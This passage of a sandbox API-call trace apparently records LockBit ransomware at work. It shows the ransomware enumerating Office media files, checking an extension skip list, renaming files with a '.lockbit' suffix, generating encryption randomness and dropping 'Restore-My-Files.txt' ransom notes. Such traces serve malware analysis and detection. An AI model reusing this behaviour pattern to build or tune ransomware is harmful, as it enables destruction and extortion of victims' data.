lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.416] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14794_.GIF") returned 1 [0203.416] lstrcmpiW (lpString1="ntldr", lpString2="BD14794_.GIF") returned 1 [0203.416] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14794_.GIF") returned 1 [0203.416] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14794_.GIF") returned 1 [0203.416] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14794_.GIF") returned -1 [0203.416] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14794_.GIF") returned 1 [0203.416] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14794_.GIF") returned 1 [0203.416] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.416] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14794_.GIF") returned=".GIF" [0203.416] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.417] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.417] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.417] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.417] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.417] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.417] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.417] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.417] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.417] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.417] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.417] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.417] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.417] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.417] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.417] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.417] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.417] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.417] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.417] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.417] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.417] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.417] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.417] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.417] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.417] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.417] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.417] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.417] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14794_.GIF.lockbit") returned 78 [0203.417] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14794_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14794_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.419] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.419] malloc (_Size=0x40068) returned 0x3df0008 [0203.419] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=259) returned 1 [0203.419] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.420] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.423] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14794_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14794_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.423] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.423] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.423] free (_Block=0x1fa2ed8) [0203.423] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14794_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.423] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.424] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.424] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc2bca00, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc9c4720, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xfc2bca00, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14795_.GIF", cAlternateFileName="")) returned 1 [0203.424] lstrcmpiW (lpString1=".", lpString2="BD14795_.GIF") returned -1 [0203.424] lstrcmpiW (lpString1="..", lpString2="BD14795_.GIF") returned -1 [0203.424] PathFindExtensionW (pszPath="BD14795_.GIF") returned=".GIF" [0203.424] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.424] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.424] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.424] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.424] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.424] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.424] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.424] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.424] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.424] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.424] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.424] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.424] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.424] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.424] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.424] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.424] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.424] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.424] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.424] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.424] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.424] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.424] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.424] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.424] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.424] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.424] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.424] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.425] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.425] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14795_.GIF") returned 1 [0203.425] lstrcmpiW (lpString1="ntldr", lpString2="BD14795_.GIF") returned 1 [0203.425] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14795_.GIF") returned 1 [0203.425] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14795_.GIF") returned 1 [0203.425] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14795_.GIF") returned -1 [0203.425] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14795_.GIF") returned 1 [0203.425] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14795_.GIF") returned 1 [0203.425] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.425] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14795_.GIF") returned=".GIF" [0203.425] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.425] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.425] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.425] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.425] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.425] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.425] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.426] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.426] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.426] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.426] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.426] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.426] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.426] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.426] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.426] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.426] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.426] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.426] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.426] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.426] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.426] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.426] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.426] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.426] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.426] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.426] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.426] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14795_.GIF.lockbit") returned 78 [0203.426] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14795_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14795_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.427] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.427] malloc (_Size=0x40068) returned 0x3df0008 [0203.427] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=219) returned 1 [0203.428] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.428] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.428] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.428] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.428] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.432] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14795_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14795_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.432] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.432] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.432] free (_Block=0x1fa2ed8) [0203.432] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14795_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.432] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.432] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.432] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x948b900, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbc9ea880, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x948b900, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14828_.GIF", cAlternateFileName="")) returned 1 [0203.432] lstrcmpiW (lpString1=".", lpString2="BD14828_.GIF") returned -1 [0203.432] lstrcmpiW (lpString1="..", lpString2="BD14828_.GIF") returned -1 [0203.432] PathFindExtensionW (pszPath="BD14828_.GIF") returned=".GIF" [0203.432] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.432] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.432] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.432] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.432] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.432] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.432] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.432] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.432] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.432] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.432] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.432] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.432] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.432] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.432] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.432] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.432] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.432] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.432] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.433] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.433] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.433] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.433] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.433] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.433] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14828_.GIF") returned 1 [0203.433] lstrcmpiW (lpString1="ntldr", lpString2="BD14828_.GIF") returned 1 [0203.433] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14828_.GIF") returned 1 [0203.433] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14828_.GIF") returned 1 [0203.433] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14828_.GIF") returned -1 [0203.433] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14828_.GIF") returned 1 [0203.433] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14828_.GIF") returned 1 [0203.433] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.434] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14828_.GIF") returned=".GIF" [0203.434] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.434] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.434] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.434] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.434] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.434] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.434] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.434] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.434] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.434] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.434] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.434] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.434] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.434] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.434] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.434] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.434] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.434] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.434] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.434] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.434] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.434] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.434] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.434] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.434] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.434] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.434] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.434] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.434] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14828_.GIF.lockbit") returned 78 [0203.434] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14828_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14828_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.437] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.437] malloc (_Size=0x40068) returned 0x3df0008 [0203.437] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=192) returned 1 [0203.437] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.437] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.437] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.438] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.438] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.441] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14828_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14828_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.441] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.441] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.441] free (_Block=0x1fa2ed8) [0203.441] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14828_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.441] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.441] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft 